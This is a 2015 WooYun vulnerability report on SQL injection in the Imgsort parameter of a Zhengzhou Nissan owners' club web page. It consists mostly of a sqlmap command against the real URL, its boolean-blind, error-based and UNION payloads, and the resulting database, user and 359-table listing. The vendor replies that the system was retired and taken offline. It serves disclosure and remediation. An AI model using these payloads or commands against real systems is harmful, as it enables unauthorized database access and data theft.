当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154493

漏洞标题:郑州日产车主俱乐部一处SQL注入

相关厂商:郑州日产汽车有限公司

漏洞作者: 路人甲

提交时间:2015-11-21 16:25

修复时间:2015-11-24 17:08

公开时间:2015-11-24 17:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-21: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经确认,细节仅向厂商公开
2015-11-24: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

sqlmap.py -u "http://club.zznissan.com.cn/shangxi/shipin.php
?Imgsort='" --time-sec=5


1.jpg


2.jpg


3.jpg


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Imgsort (GET)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: Imgsort=-4920' OR MAKE_SET(3754=3754,5349) AND 'PwBy'='PwBy
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: Imgsort=-3297' OR 1 GROUP BY CONCAT(0x7176716b71,(SELECT (CASE WHEN (2095=2095) THEN 1 ELSE 0 END)),0x7176766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: UNION query
    Title: MySQL UNION query (random number) - 20 columns
    Payload: Imgsort=-5659' UNION ALL SELECT 9074,9074,9074,9074,9074,9074,9074,9074,9074,9074,CONCAT(0x7176716b71,0x4164564a666272435877,0x7176766271),9074,9074,9074,9074,9074,9074,9074,9074,9074#
---
web application technology: Apache
back-end DBMS: MySQL 5
current database:    'paladinclub'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Imgsort (GET)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: Imgsort=-4920' OR MAKE_SET(3754=3754,5349) AND 'PwBy'='PwBy
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: Imgsort=-3297' OR 1 GROUP BY CONCAT(0x7176716b71,(SELECT (CASE WHEN (2095=2095) THEN 1 ELSE 0 END)),0x7176766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: UNION query
    Title: MySQL UNION query (random number) - 20 columns
    Payload: Imgsort=-5659' UNION ALL SELECT 9074,9074,9074,9074,9074,9074,9074,9074,9074,9074,CONCAT(0x7176716b71,0x4164564a666272435877,0x7176766271),9074,9074,9074,9074,9074,9074,9074,9074,9074#
---
web application technology: Apache
back-end DBMS: MySQL 5
current user:    'paladinclub@localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Imgsort (GET)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: Imgsort=-4920' OR MAKE_SET(3754=3754,5349) AND 'PwBy'='PwBy
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: Imgsort=-3297' OR 1 GROUP BY CONCAT(0x7176716b71,(SELECT (CASE WHEN (2095=2095) THEN 1 ELSE 0 END)),0x7176766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: UNION query
    Title: MySQL UNION query (random number) - 20 columns
    Payload: Imgsort=-5659' UNION ALL SELECT 9074,9074,9074,9074,9074,9074,9074,9074,9074,9074,CONCAT(0x7176716b71,0x4164564a666272435877,0x7176766271),9074,9074,9074,9074,9074,9074,9074,9074,9074#
---
web application technology: Apache
back-end DBMS: MySQL 5
available databases [3]:
[*] information_schema
[*] paladinclub
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Imgsort (GET)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: Imgsort=-4920' OR MAKE_SET(3754=3754,5349) AND 'PwBy'='PwBy
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: Imgsort=-3297' OR 1 GROUP BY CONCAT(0x7176716b71,(SELECT (CASE WHEN (2095=2095) THEN 1 ELSE 0 END)),0x7176766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: UNION query
    Title: MySQL UNION query (random number) - 20 columns
    Payload: Imgsort=-5659' UNION ALL SELECT 9074,9074,9074,9074,9074,9074,9074,9074,9074,9074,CONCAT(0x7176716b71,0x4164564a666272435877,0x7176766271),9074,9074,9074,9074,9074,9074,9074,9074,9074#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: paladinclub
[359 tables]
+------------------------------+
| language                     |
| user                         |
| a_customers                  |
| a_floor                      |
| a_user                       |
| article                      |
| carinfo                      |
| category                     |
| cj_jl                        |
| clubblock                    |
| clubinfo                     |
| czhd_memberinfo              |
| dakar                        |
| dakar2006                    |
| dakar20061                   |
| dakar20062                   |
| dakar20063                   |
| dakar_config                 |
| east2008_answer              |
| east2008_loginrecord         |
| east2008_question            |
| east2008_user                |
| east2008pho_loginrecord      |
| east2008pho_photo            |
| east2008pho_toupiao          |
| east2008pho_user             |
| eastgames_notify             |
| fankui                       |
| file_flow                    |
| file_flow_060817_bak         |
| file_info                    |
| file_info_060817_bak         |
| file_save                    |
| file_share                   |
| file_share_060817_bak        |
| hk_article                   |
| hk_class                     |
| huikan                       |
| imagefile                    |
| imgcategory                  |
| khly_hz                      |
| linesname                    |
| lmsj                         |
| media                        |
| memberawoke                  |
| memberinfo                   |
| memberinfo1                  |
| memberinfo_bak               |
| memberinfo_t                 |
| membermark                   |
| membermodify                 |
| memberpay                    |
| oneq_mission                 |
| oneq_missiondata             |
| online                       |
| paladin_awards               |
| prov                         |
| pw_actattachs                |
| pw_actions                   |
| pw_active                    |
| pw_activity                  |
| pw_activitycate              |
| pw_activitydefaultvalue      |
| pw_activityfield             |
| pw_activitymembers           |
| pw_activitymodel             |
| pw_activitypaylog            |
| pw_activityvalue1            |
| pw_activityvalue10           |
| pw_activityvalue11           |
| pw_activityvalue12           |
| pw_activityvalue13           |
| pw_activityvalue14           |
| pw_activityvalue15           |
| pw_activityvalue16           |
| pw_activityvalue17           |
| pw_activityvalue18           |
| pw_activityvalue2            |
| pw_activityvalue3            |
| pw_activityvalue4            |
| pw_activityvalue5            |
| pw_activityvalue6            |
| pw_activityvalue7            |
| pw_activityvalue8            |
| pw_activityvalue9            |
| pw_actmember                 |
| pw_actmembers                |
| pw_administrators            |
| pw_adminlog                  |
| pw_adminset                  |
| pw_advert                    |
| pw_announce                  |
| pw_area_level                |
| pw_areas                     |
| pw_argument                  |
| pw_attachbuy                 |
| pw_attachdownload            |
| pw_attachs                   |
| pw_attention                 |
| pw_attention_blacklist       |
| pw_auth_certificate          |
| pw_ban                       |
| pw_banuser                   |
| pw_bbsinfo                   |
| pw_block                     |
| pw_buyadvert                 |
| pw_cache                     |
| pw_cache_distribute          |
| pw_cache_members             |
| pw_cachedata                 |
| pw_channel                   |
| pw_clientorder               |
| pw_cmembers                  |
| pw_cms_article               |
| pw_cms_articlecontent        |
| pw_cms_articleextend         |
| pw_cms_attach                |
| pw_cms_column                |
| pw_cms_comment               |
| pw_cms_commentreply          |
| pw_cms_purview               |
| pw_cnalbum                   |
| pw_cnclass                   |
| pw_cnlevel                   |
| pw_cnphoto                   |
| pw_cnskin                    |
| pw_cnstyles                  |
| pw_collection                |
| pw_collectiontype            |
| pw_colonys                   |
| pw_comment                   |
| pw_company                   |
| pw_config                    |
| pw_creditlog                 |
| pw_credits                   |
| pw_customfield               |
| pw_cwritedata                |
| pw_datanalyse                |
| pw_datastate                 |
| pw_datastore                 |
| pw_debateclass               |
| pw_debatedata                |
| pw_debateinfo                |
| pw_debatereplys              |
| pw_debates                   |
| pw_debatethreads             |
| pw_delta_diarys              |
| pw_delta_members             |
| pw_delta_posts               |
| pw_delta_threads             |
| pw_diary                     |
| pw_diarytype                 |
| pw_draft                     |
| pw_elements                  |
| pw_extragroups               |
| pw_favors                    |
| pw_feed                      |
| pw_filter                    |
| pw_filter_class              |
| pw_filter_dictionary         |
| pw_focus                     |
| pw_forumdata                 |
| pw_forumlog                  |
| pw_forummsg                  |
| pw_forums                    |
| pw_forumsell                 |
| pw_forumsextra               |
| pw_forumtype                 |
| pw_friends                   |
| pw_friendtype                |
| pw_group_replay              |
| pw_hack                      |
| pw_help                      |
| pw_hits_threads              |
| pw_home                      |
| pw_invitecode                |
| pw_inviterecord              |
| pw_invoke                    |
| pw_invokepiece               |
| pw_ipstates                  |
| pw_job                       |
| pw_jober                     |
| pw_kmd_info                  |
| pw_kmd_paylog                |
| pw_kmd_spread                |
| pw_kmd_user                  |
| pw_log_aggregate             |
| pw_log_attachs               |
| pw_log_colonys               |
| pw_log_diary                 |
| pw_log_forums                |
| pw_log_members               |
| pw_log_postdefend            |
| pw_log_posts                 |
| pw_log_postverify            |
| pw_log_setting               |
| pw_log_threads               |
| pw_log_userdefend            |
| pw_log_weibos                |
| pw_medal_apply               |
| pw_medal_award               |
| pw_medal_info                |
| pw_medal_log                 |
| pw_medalinfo                 |
| pw_medalslogs                |
| pw_medaluser                 |
| pw_member_behavior_statistic |
| pw_membercredit              |
| pw_memberdata                |
| pw_memberinfo                |
| pw_members                   |
| pw_members0705               |
| pw_members123                |
| pw_membersnew                |
| pw_membertags                |
| pw_membertags_relations      |
| pw_memo                      |
| pw_merge_posts               |
| pw_merge_tmsgs               |
| pw_modehot                   |
| pw_modules                   |
| pw_mpageconfig               |
| pw_ms_attachs                |
| pw_ms_configs                |
| pw_ms_messages               |
| pw_ms_relations              |
| pw_ms_replies                |
| pw_ms_searchs                |
| pw_ms_tasks                  |
| pw_msg                       |
| pw_msgc                      |
| pw_msglog                    |
| pw_nav                       |
| pw_oboard                    |
| pw_online                    |
| pw_online_guest              |
| pw_online_statistics         |
| pw_online_user               |
| pw_ouserdata                 |
| pw_overprint                 |
| pw_owritedata                |
| pw_pagecache                 |
| pw_pageinvoke                |
| pw_pcfield                   |
| pw_pcmember                  |
| pw_pcvalue1                  |
| pw_permission                |
| pw_pidtmp                    |
| pw_pinglog                   |
| pw_plan                      |
| pw_polls                     |
| pw_portalpage                |
| pw_postcate                  |
| pw_posts                     |
| pw_postsfloor                |
| pw_poststopped               |
| pw_privacy                   |
| pw_proclock                  |
| pw_pushdata                  |
| pw_pushpic                   |
| pw_rate                      |
| pw_rateconfig                |
| pw_rateresult                |
| pw_recycle                   |
| pw_replyreward               |
| pw_replyrewardrecord         |
| pw_report                    |
| pw_reward                    |
| pw_robbuild                  |
| pw_robbuildfloor             |
| pw_schcache                  |
| pw_school                    |
| pw_searchadvert              |
| pw_searchforum               |
| pw_searchfourm               |
| pw_searchhotwords            |
| pw_searchstatistic           |
| pw_setform                   |
| pw_sharelinks                |
| pw_sharelinksrelation        |
| pw_sharelinkstype            |
| pw_singleright               |
| pw_smiles                    |
| pw_space                     |
| pw_sqlcv                     |
| pw_stamp                     |
| pw_statistics_daily          |
| pw_stopic                    |
| pw_stopic_comment            |
| pw_stopic_commentreply       |
| pw_stopicblock               |
| pw_stopiccategory            |
| pw_stopicpictures            |
| pw_stopicunit                |
| pw_styles                    |
| pw_tagdata                   |
| pw_tags                      |
| pw_task                      |
| pw_temp_keywords             |
| pw_threads                   |
| pw_threads_at                |
| pw_threads_img               |
| pw_tmsgs                     |
| pw_toollog                   |
| pw_tools                     |
| pw_topiccate                 |
| pw_topicfield                |
| pw_topicmodel                |
| pw_topictype                 |
| pw_topicvalue1               |
| pw_topicvalue2               |
| pw_topicvalue3               |
| pw_topicvalue4               |
| pw_topicvalue5               |
| pw_topicvalue6               |
| pw_topicvalue7               |
| pw_topicvalue8               |
| pw_tpl                       |
| pw_tpltype                   |
| pw_trade                     |
| pw_tradeorder                |
| pw_ucapp                     |
| pw_ucnotify                  |
| pw_ucsyncredit               |
| pw_user_career               |
| pw_user_education            |
| pw_userapp                   |
| pw_userbinding               |
| pw_usercache                 |
| pw_usergroups                |
| pw_usertool                  |
| pw_voter                     |
| pw_wappush                   |
| pw_wappushtype               |
| pw_weibo_bind                |
| pw_weibo_cmrelations         |
| pw_weibo_cnrelations         |
| pw_weibo_comment             |
| pw_weibo_content             |
| pw_weibo_login_session       |
| pw_weibo_login_user          |
| pw_weibo_referto             |
| pw_weibo_relations           |
| pw_weibo_topicattention      |
| pw_weibo_topicrelations      |
| pw_weibo_topics              |
| pw_windcode                  |
| pw_wordfb                    |
| pw_write_smiles              |
| pw_yun_setting               |
| topic                        |
| trip                         |
| user_bak                     |
| userfun                      |
| usergroup                    |
| wqw_city                     |
| wqw_prov                     |
| xly_user                     |
| xunlianying                  |
+------------------------------+

漏洞证明:

修复方案:

过滤相关参数

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-23 09:50

厂商回复:

谢谢!这里的确有问题。
不过这个系统已经废弃了,最近联系业务下线。

最新状态:

2015-11-24:废弃的这套系统已经下线处理。